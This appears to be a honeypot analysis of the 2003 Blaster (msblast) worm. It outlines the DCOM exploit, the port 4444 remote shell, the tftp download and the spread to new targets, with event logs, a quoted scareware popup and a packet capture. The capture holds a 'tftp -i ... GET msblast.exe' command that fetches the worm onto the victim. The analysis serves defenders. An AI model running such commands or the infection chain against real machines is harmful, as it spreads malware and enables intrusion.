W32/msblast Worm

Infection sequence:
  1. SOURCE sends packets to port 135 tcp with variation of dcom.c exploit to TARGET

  2. this causes a remote shell on port 4444 at the TARGET

  3. the SOURCE now sends the tftp get command to the TARGET, using the shell on port 4444,

  4. the target will now connect to the tftp server at the SOURCE and download the worm msblast.exe to C:\WINDOWS\SYSTEM32\MSBLAST.EXE.
    Its MD5 signature is
    5ae700c1dffb00cef492844a4db6cd69 msblast.exe

  5. Start the worm (msblast.exe) via the target remote shell

  6. Scan other target

Event log shown in the honeypot:

honey2 USER32: NT AUTHORITY\SYSTEM: The process winlogon.exe has initiated the restart of PC20 for the following reason: No title fo r this reason could be found Minor Reason: 0xff Shutdown Type: reboot Comment: Windows must now restart because the Remote Procedure Call (RPC) serv ice terminated unexpectedly honey2 Service Control Manager: N/A: The Remote Procedure Call (RPC) service terminated unexpectedly. It has done this 1 time(s). Th e following corrective action will be taken in 60000 milliseconds: Reboot the machine.

Pick up some popup ads too.

honey2 Application Popup: N/A: Application popup: Messenger Service : Message from VIRUS WARNING! to Blaster Infect on 8/17/2003 4:19 :16 AM W A R N I N G - Your computer was just scanned for a potential BLASTER WORM vulnerability and is wide open to infection! If You Are Reading Th is Message Your Computer Is Wide Open And Can Easily Be Infected by the New Blaster Virus! Hackers Could Walk Right Into Your Computer! If you ACT NO W you can stop ( ALL ) popup messages and get our Safety Browser for FREE. Also for a limited time only with every purchase of our popup stopper, we will also include the Blaster Worm Stopper Patch 100% FREE! *** WWW. WEB-UTILS. COM *** *** WWW. WEB-UTILS. COM *** *** WWW. WEB-UTILS. COM *** *** W WW. WEB-UTILS. COM *** *** WWW. WEB-UTILS. COM *** *** WWW. WEB-UTILS. COM ***

Hacking pattern

Worm propagate from a private IP network

08/19-14:00:17.918435 81.50.159.105:58322 -> 192.168.20.2:4444 TCP TTL:108 TOS:0x0 ID:11592 IpLen:20 DgmLen:74 DF ***AP*** Seq: 0xE99DB9C1 Ack: 0x1EDF0906 Win: 0xFAF0 TcpLen: 20 tftp -i 10.1.2.34 GET msblast.exe. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ Microsoft RPC alert from our upstream IDS